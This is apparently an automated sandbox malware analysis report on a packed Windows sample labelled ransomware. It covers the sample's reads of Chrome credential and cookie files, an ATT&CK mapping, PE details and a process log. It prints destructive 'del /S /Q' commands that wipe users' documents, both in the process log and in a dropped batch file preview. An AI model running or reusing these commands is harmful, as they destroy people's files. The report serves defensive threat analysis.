Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000a	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\MANIFEST-000001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\000003.log	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\000003.log	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Current Tabs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Media History-journal	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db-journal	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\33d102032f141cd7_0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Reporting and NEL	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Media History	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journal	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Last Session	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\CURRENT	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOCK	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOCK	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000003.log	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\1e3343c9662f5434_0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Trust Tokens-journal	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor-journal	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fee6704ec67d5ed1_0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection12	Virtualization/Sandbox Evasion11	OS Credential Dumping1	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Security Software Discovery12	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Virtualization/Sandbox Evasion11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing11	NTDS	Process Discovery3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	File Deletion1	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery12	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Z0hOr2pD7k.exe	56%	Virustotal		Browse
Z0hOr2pD7k.exe	20%	Metadefender		Browse
Z0hOr2pD7k.exe	39%	ReversingLabs	Win32.Ransomware.Encoder
Z0hOr2pD7k.exe	100%	Avira	TR/Dropper.Gen
Z0hOr2pD7k.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.0.Z0hOr2pD7k.exe.9c0000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen2		Download File
0.2.Z0hOr2pD7k.exe.9c0000.0.unpack	100%	Avira	HEUR/AGEN.1110391		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.xvideos.com	Z0hOr2pD7k.exe, 00000000.00000002.917145240.00000000010FD000.00000004.00000001.sdmp	false		high
https://www.xvideos.com/video64080443/_	Z0hOr2pD7k.exe, 00000000.00000002.917145240.00000000010FD000.00000004.00000001.sdmp	false		high

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	452577
Start date:	22.07.2021
Start time:	15:57:09
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Z0hOr2pD7k (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	75
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.spyw.evad.winEXE@128/22@0/0
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): SearchUI.exe, BackgroundTransferHost.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, svchost.exe Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtQueryVolumeInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:58:00	API Interceptor	1x Sleep call for process: Z0hOr2pD7k.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

\Device\ConDrv Download File
Process:	C:\Users\user\Desktop\Z0hOr2pD7k.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	945
Entropy (8bit):	4.3861642457709715
Encrypted:	false
SSDEEP:	12:k00fG8GxH0V0GhGG0Y10Wk0WdkG04KGM08Gq0GIKGrGu0g020JOH0M0Y:KaUqXWJWa4Pr0dP3RY
MD5:	1ADBBD570354E68D34F2F31F3459DF05
SHA1:	3B20056EEB1010C6FA3943F608435627F22C2302
SHA-256:	13E4A5FB6A53469020B4B09092DFCD7A4CD5CA3796ACA23020C5105ADABFD584
SHA-512:	BA8283C3124847227AD9BC81D3E42728441057EA4BECBF5B6338194A415D0AE6BA2B0ECC2BEE6FBDDC0E9D22A590B3BC5834E1B357DFAF9EDA0D8B87ABD71649
Malicious:	false
Preview:	del /S /Q .doc c:\users\%username%\ > nul..del /S /Q .docm c:\users\%username%\ > nul..del /S /Q .docx c:\users\%username%\ > nul..del /S /Q .dot c:\users\%username%\ > nul..del /S /Q .dotm c:\users\%username%\ > nul..del /S /Q .dotx c:\users\%username%\ > nul..del /S /Q .pdf c:\users\%username%\ > nul..del /S /Q .csv c:\users\%username%\ > nul..del /S /Q .xls c:\users\%username%\ > nul..del /S /Q .xlsx c:\users\%username%\ > nul..del /S /Q .xlsm c:\users\%username%\ > nul..del /S /Q .ppt c:\users\%username%\ > nul..del /S /Q .pptx c:\users\%username%\ > nul..del /S /Q .pptm c:\users\%username%\ > nul..del /S /Q .jtdc c:\users\%username%\ > nul..del /S /Q .jttc c:\users\%username%\ > nul..del /S /Q .jtd c:\users\%username%\ > nul..del /S /Q .jtt c:\users\%username%\ > nul..del /S /Q .txt c:\users\%username%\ > nul..del /S /Q .exe c:\users\%username%\ > nul..del /S /Q *.log c:\users\%username%\ > nul..

\Device\Null Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2324
Entropy (8bit):	4.938033230487595
Encrypted:	false
SSDEEP:	48:ICD6DO2xDi2xD48xDSxDPxDT8xDLbDiDFDybcxDybLDybRDysDKDpDhDXUbvXUbp:ICaO2ti2tntStPtwtLniBygty7yJJKlp
MD5:	4D49A90F8BC3A9D8E88BF0B9E1665ACD
SHA1:	75A87EA6D89C8EF074F329E1AAC0E1AC92F29DD4
SHA-256:	1A2F0410A26F323EC3CA4609FCB3CC953A611A77B0BCE54C12542F40549404E5
SHA-512:	A0A0A9BF7BC65B09316E22E5C72BBD0DDE415A3AEB0842376290DD543B9B0D21D59B1A7606A59A26D0DA4FD6BB3BB35C25B24AFDA18D54569F208D4C53CD0275
Malicious:	false
Preview:	c:\users\user\AppData\Local\Microsoft\GameDVR\KnownGameList.bin..c:\users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db..c:\users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db..c:\users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db..c:\users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db..c:\users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db..c:\users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db..c:\users\user\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm595.tmp..c:\users\user\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm596.tmp..c:\users\user\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm597.tmp..c:\users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db..c:\users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db-shm..c:\users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.d

Static File Info

General
File type:	PE32 executable (console) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):	3.7984307029224165
TrID:	Win32 Executable (generic) a (10002005/4) 99.66% UPX compressed Win32 Executable (30571/9) 0.30% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Z0hOr2pD7k.exe
File size:	571904
MD5:	8edf0aa789d976df0c80fd8d62734ded
SHA1:	54a8b718fda1ea749df17271d3f897c947004483
SHA256:	fb80dab592c5b2a1dcaaf69981c6d4ee7dbf6c1f25247e2ab648d4d0dc115a97
SHA512:	577d6e311160a8435ad7b5318e17b51b1e0dbf12ef8e484995890ba48a2860b95ac525b0107bebd312615c05f56320ca8d11946135c6093a01fb27141e548741
SSDEEP:	3072:ApJs5aBFWosyzhIXj4Ix0RBZbAi4BGijv4Li+gFUm0ZJgRlLPwKIhyWcMyHSZbqv:ApJoKzhIXj4Ix0rZbZW
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........oZ...4...4...4..v....4..{5...4..{1...4..{0...4..{7...4..e5...4...5...4..{=...4..{....4.......4..{6...4.Rich..4................

File Icon


Icon Hash:	08e4e6c8c8dcf408

Static PE Info

General
Entrypoint:	0x4928c0
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60F66485 [Tue Jul 20 05:52:05 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	b7373c4e4b3b995daa8d1068e812ff00

Entrypoint Preview

Instruction
pushad
mov esi, 00491000h
lea edi, dword ptr [esi-00090000h]
push edi
or ebp, FFFFFFFFh
jmp 00007F7754BDCAF2h
nop
nop
nop
nop
nop
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007F7754BDCAE9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F7754BDCACFh
mov eax, 00000001h
add ebx, ebx
jne 00007F7754BDCAE9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007F7754BDCAEDh
jne 00007F7754BDCB0Ah
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F7754BDCB01h
dec eax
add ebx, ebx
jne 00007F7754BDCAE9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007F7754BDCAB6h
add ebx, ebx
jne 00007F7754BDCAE9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007F7754BDCB34h
xor ecx, ecx
sub eax, 03h
jc 00007F7754BDCAF3h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007F7754BDCB57h
sar eax, 1
mov ebp, eax
jmp 00007F7754BDCAEDh
add ebx, ebx
jne 00007F7754BDCAE9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F7754BDCAAEh
inc ecx
add ebx, ebx
jne 00007F7754BDCAE9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F7754BDCAA0h
add ebx, ebx
jne 00007F7754BDCAE9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007F7754BDCAD1h
jne 00007F7754BDCAEBh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F7754BDCAC6h
add ecx, 02h
cmp ebp, FFFFFB00h
adc ecx, 02h
lea edx, dword ptr [eax+eax]

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x11c578	0x2b0	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x93000	0x89578	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x11c828	0x14	.rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x92aa4	0xbc	UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0x90000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
UPX1	0x91000	0x2000	0x1c00	False	0.923549107143	data	7.66105631361	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x93000	0x8a000	0x89a00	False	0.0821110779973	data	3.71346043147	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x9323c	0x42028	data	Japanese	Japan
RT_ICON	0xd5268	0x25228	data	Japanese	Japan
RT_ICON	0xfa494	0x10828	data	Japanese	Japan
RT_ICON	0x10acc0	0x94a8	data	Japanese	Japan
RT_ICON	0x11416c	0x4228	data	Japanese	Japan
RT_ICON	0x118398	0x25a8	data	Japanese	Japan
RT_ICON	0x11a944	0x10a8	data	Japanese	Japan
RT_ICON	0x11b9f0	0x988	data	Japanese	Japan
RT_GROUP_ICON	0x11c37c	0x76	data	Japanese	Japan
RT_MANIFEST	0x11c3f8	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
api-ms-win-crt-heap-l1-1-0.dll	_set_new_mode
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale
api-ms-win-crt-math-l1-1-0.dll	__setusermatherr
api-ms-win-crt-runtime-l1-1-0.dll	exit
api-ms-win-crt-stdio-l1-1-0.dll	_set_fmode
api-ms-win-crt-string-l1-1-0.dll	_stricmp
KERNEL32.DLL	LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
USER32.dll	EnumWindows
VCRUNTIME140.dll	memset

Possible Origin

Language of compilation system	Country where language is spoken	Map
Japanese	Japan
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: Z0hOr2pD7k.exe PID: 6552 Parent PID: 6012

General

Start time:	15:57:59
Start date:	22/07/2021
Path:	C:\Users\user\Desktop\Z0hOr2pD7k.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Z0hOr2pD7k.exe'
Imagebase:	0x9c0000
File size:	571904 bytes
MD5 hash:	8EDF0AA789D976DF0C80FD8D62734DED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Start time:	15:58:01
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2015 Microsoft Corporation
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Start time:	15:58:06
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo DO NOT STOP THE PROCESS
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Start time:	15:58:07
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo Wait a minute...
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Start time:	15:58:08
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c del /S /Q *.doc c:\users\%username%\ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Start time:	15:58:12
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Start time:	15:58:17
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:58:21
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:58:25
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:58:29
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:58:36
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c del /S /Q *.pdf c:\users\%username%\ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:58:39
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c del /S /Q *.csv c:\users\%username%\ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:58:44
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c del /S /Q *.xls c:\users\%username%\ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:58:48
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:58:54
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:58:59
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c del /S /Q *.ppt c:\users\%username%\ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:59:04
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
